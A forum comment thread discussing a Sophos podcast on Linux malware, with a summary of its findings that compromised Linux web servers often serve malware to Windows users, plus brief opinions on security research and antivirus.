

Malware on Linux – When Penguins Attack - fgeorgy
https://nakedsecurity.sophos.com/2015/07/28/malware-on-linux-when-penguins-attack/

======
em3rgent0rdr
curiously, I'm on fsf-endorsed parabola linux, and of course the soundcloud
won't play due to iceweasel's default privacy protections.

Could someone who listened to this podcast enlighten me with brief summary?
Mainly, if I only install the open-source vetted software from my package
distributor, and don't do silly things like insert untrusted usb devices or
run binaries not from my distro's repository, or execute random scrips from
the internet, or disable my sudo password, or not keep up-do-date with
security patches, and assuming I'm not subject to 0-days, then how does the
malware get in?

The only malware I'm aware that I've ever had on linux is from ubuntu
installing the amazon search thingie, or from proprietary programs I thought I
might try which ended up running stuff I didn't want in the background.

~~~
choudanu4
The security researcher who was interviewed was not able to garner how the
malware gets in as that would require breaking into the infected systems,
which he was not prepared to do (as it would be illegal).

The entire podcast was simply statistics, with the occasional repeated
reminder to update packages.

The key takeaway was that linux servers when infected are often used as attack
vectors for distributing a further set of malware on windows computers (which
are the end target). The estimate from the podcast said of the compromised
URLs that the researcher investigated, 80% ran some derivative of linux (i.e.
apache server) and 20% were windows (an insignificant [~.1%] were other OSs).
Another point, the researcher claimed was that 20% of the "compromised" linux
URLs were actually infrastructure set up by exploiters themselves, rather than
servers taken over forcibly. A final point, the researcher noted that many (no
definite statistic here) of the compromised linux servers were running old
versions of software (be it apache or whatever).

TL;DR: Linux servers (when compromised) are often used as attack vectors to
distribute malware to Windows computers (which are the end targets).

~~~
em3rgent0rdr
Sounds like the title should have been, "when malicious internet servers
attack!"

>> "The security researcher who was interviewed was not able to garner how the
malware gets in as that would require breaking into the infected systems,
which he was not prepared to do (as it would be illegal)."

Not much of a security researcher if we aren't breaking into systems. My
understand of the term "security research" is that you hack into systems under
safely quarentined experimental setups to provide specific knowledge of how,
in order to improve future systems.

------
jmnicolas
I think it's even worse on Linux, because on Windows you have an anti-virus
that might detect you have a malware. On Linux you're blind.

